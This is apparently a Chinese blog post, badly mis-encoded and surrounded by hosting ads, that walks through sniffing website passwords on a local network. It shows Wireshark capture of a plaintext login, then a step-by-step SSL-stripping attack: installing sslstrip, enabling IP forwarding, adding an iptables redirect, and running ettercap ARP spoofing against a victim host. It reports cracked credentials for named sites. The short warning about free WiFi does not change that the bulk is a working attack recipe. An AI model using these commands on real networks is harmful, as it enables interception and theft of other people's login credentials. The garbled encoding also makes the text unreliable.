因?qū)懥艘欢挝淖?,就有這個(gè)抓包實(shí)驗(yàn)
成都網(wǎng)站建設(shè)哪家好,找成都創(chuàng)新互聯(lián)公司!專注于網(wǎng)頁(yè)設(shè)計(jì)、重慶網(wǎng)站建設(shè)公司、微信開發(fā)、微信平臺(tái)小程序開發(fā)、集團(tuán)企業(yè)網(wǎng)站設(shè)計(jì)等服務(wù)項(xiàng)目。核心團(tuán)隊(duì)均擁有互聯(lián)網(wǎng)行業(yè)多年經(jīng)驗(yàn),服務(wù)眾多知名企業(yè)客戶;涵蓋的客戶類型包括:集裝箱等眾多領(lǐng)域,積累了大量豐富的經(jīng)驗(yàn),同時(shí)也獲得了客戶的一致表?yè)P(yáng)!--------------------------------
話說:“現(xiàn)在我們一到某處,第一件事便是問有沒有WiFi”。WiFi成為當(dāng)下的熱門,在公共場(chǎng)合人們最喜歡免費(fèi)WiFi。但用著用著后不覺QQ被盜了。這WiFi便是誘餌,釣魚人設(shè)了一個(gè)局,我們以為撿到便宜了,須不知,我們上勾了。QQ被盜,郵箱被瀏覽等等。免費(fèi)雖好,請(qǐng)謹(jǐn)慎。
---------------------------------------
1.利用wireshark抓包測(cè)試51cto帳戶及密碼
環(huán)境的搭建
網(wǎng)絡(luò)環(huán)境:網(wǎng)關(guān):192.168.199.1;
測(cè)試主機(jī):192.168.199.101,ubuntu13.04/wireshark;
測(cè)試目標(biāo):51cto.com
步驟
a.ubuntu 13.04安裝wireshark
sudo apt-get wireshark
b. 新建wireshark組把普通用戶加入其中,給wireshark使用權(quán)限
sudo groupadd wireshark //加組wireshark
sudo gpasswd -a zozlin wireshark //向組 GROUP 中添加用戶 USER
sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改組
sudo chmod 4755 /usr/bin/dumpcap //可執(zhí)行權(quán)限
錯(cuò)誤:
解決方法:sudo gedit /usr/share/wireshark/init.lua
倒數(shù)第二行原來為:dofile(DATA_DIR.."console.lua")改為--dofile(DATA_DIR.."console.lua")
c. sudo wireshark 選擇網(wǎng)卡(在本機(jī)測(cè)試)
定過濾規(guī)則
ip.src==192.168.199.100 && http (源地址及http協(xié)議)
重點(diǎn) (post application/x-www-form-urllencoded)
先試試天涯論壇和163郵件的密碼,ssl己加密傳輸了。后51cto 發(fā)現(xiàn)是明文帳號(hào)密碼
-----------------------------------------
2.利用sslstrip和ettercap突破ssl嗅探密碼
環(huán)境的搭建
網(wǎng)絡(luò)環(huán)境:網(wǎng)關(guān):192.168.199.1;
***主機(jī):192.168.199.101,ubuntu13.04/wireshark/sslstrip;
被***主機(jī):192.168.199.105/103,虛擬機(jī)Windowsxp,IE6;
測(cè)試目標(biāo):51cto.com mail.163.com tianya.cn baidu.com
步驟
下載
http://www.thoughtcrime.org/software/sslstrip/
解壓
tar -zxvf sslstrip-0.9.tar.gz
安裝
sslstrip python setup.py install
打開ip_forword轉(zhuǎn)發(fā)
echo “1”>/proc/sys/net/ipv4/ip_forward
使用Iptables過濾數(shù)據(jù)包 //通過iptables 把所有http數(shù)據(jù)導(dǎo)入到10000端口,我們用sslstrip監(jiān)聽10000端口,并得到我們想要的數(shù)據(jù)
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -l 10000
利用ettercap進(jìn)行arp欺騙
ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/
成果
mail.163.com 51cto.com 破
baidu.com 密碼再次加密了
tianya.cn 未破
參考1.http://www.freebuf.com/articles/web/5929.html
2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html
3.http://www.linuxde.net/2011/11/2522.html
另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時(shí)售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì),專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。